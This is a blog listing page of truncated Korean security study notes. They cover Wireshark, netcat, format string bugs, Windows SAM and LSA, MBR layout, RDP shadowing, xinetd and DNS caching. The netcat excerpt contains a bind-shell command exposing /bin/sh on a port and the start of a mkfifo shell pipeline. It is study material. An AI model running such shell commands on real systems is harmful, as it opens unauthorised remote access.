Wireshark / tcpdump
ShortCut | | | | — | — | | Ctrl + F | 하고 나서 Ctrl +N / B | | Ctrl + M 마커 | 하고 나서 Shift + Ctrl + N / B | Tip SYN이후 모든 segment는 ACK flag가 set(1)되어있다. File-Export HTTP Object 기능 유용. frame...
ShortCut | | | | — | — | | Ctrl + F | 하고 나서 Ctrl +N / B | | Ctrl + M 마커 | 하고 나서 Shift + Ctrl + N / B | Tip SYN이후 모든 segment는 ACK flag가 set(1)되어있다. File-Export HTTP Object 기능 유용. frame...
standalone server 이를 이용하면 non-socket programming binary도 standalone server로 동작할 수 있다. 근데 하나의 connection만 처리할 수 있으며 connection이 종료되면 nc도 꺼진다. $ nv -vvv -e /bin/sh -l -p 1234 $ rm -f /tmp/f; mkfif...
#1 %08x / n$ %x보다 %08x를 사용하는 편이 보기도 좋고, 출력 문자 개수 맞추기도 편하다. %hn이전에 선행 출력 문자 개수를 만들 때도 c %\*x || %\*d를 사용한다. + 특정 위치 데이터를 출력하려면 n$ 이용한다. #2 %hn %n이 작용하는 순간 그 위치 포함 +4 bytes가 0으로 초기화 되면서 값이 써진다....
LSA , Local Secu rity Authority [ lsass.exe ] SRM , Security Reference Monitor SAM , Security A ccount Manager SAM windows 계정의 패스워드 해시를 저장하고 있는, *nix의 /etc/shadow같은 파일이다. SYSKEY로 암호화 되...
Interrupt가 발생하면 CPU는 ISR로 진입하게 되며 Interrupt를 적절히 처리해 주는 것은 OS의 역할이다. 이는 Interrupt가 하드웨어적으로 CPU에 바로 입력되기 때문에 가능하다. * CPU pin 중에 Interrupt pin이 하나 존재한다. 각각의 디바이스는 Interrupt Controller를 가지고 있는데, 여기서 C...
MBR 앞쪽 440Byte에는 bootstrapping program이 들어있고, OS-specific하다. ( Windows MBR laoder, LILO, GRUB… ) MBR의 446~509( 64Byte )Byte에 Partition Table이 들어있고, bootstrapping program과 달리 표준화되어있다. 각 파티...
Shadowing Terminal Services session 을 이용해 다른 터미널 세션을 컨트롤 할 수 있다. 즉 다른 사용자가 보고있는 그 화면 자체를 보거나, 컨트롤 할 수 있기 때문에 이를 이용해 원격지원 할 수 있다. RDP 시 /shadow:[sessionID]를 붙여주거나, 일단 RDP로 연결한 다음 cmd - mstsc /shado...
micro-inetd usage: micro-inetd port program [args...] xinetd 원래 유닉스 기반 시스템에서 네트워크 서비스를 제공하는 방법으로는 inetd + tcpd 조합과 standalone 방식이 있었다. 요즘은 보안측면의 한계로 inetd 대신 xinetd를 사용한다. xinetd를 사용하면 tcpd로 패킷...
DNS cache, hosts file, query order windows The entries in the ho sts file are loaded into DNS cache by DNS Client Service programs looks for DNS cache as the first step on name resolution. ...
공학에서 선형성이라는 단어는 참 많이나온다. 컴퓨터 공학에서도 물론 등장하거니와 암호학을 공부하다보면 비선형함수를 선형화시키는 공격이 나오기도 한다. 선형대수를 공부하는 이유는, 선형함수를 가우스소거법이나 adjoint matrix, rank어쩌구, eigenvalue 등을 이용해 문제를 단순 연립방정식 노가다 대비 쉽게 해결할 수 있기 때문이다. ...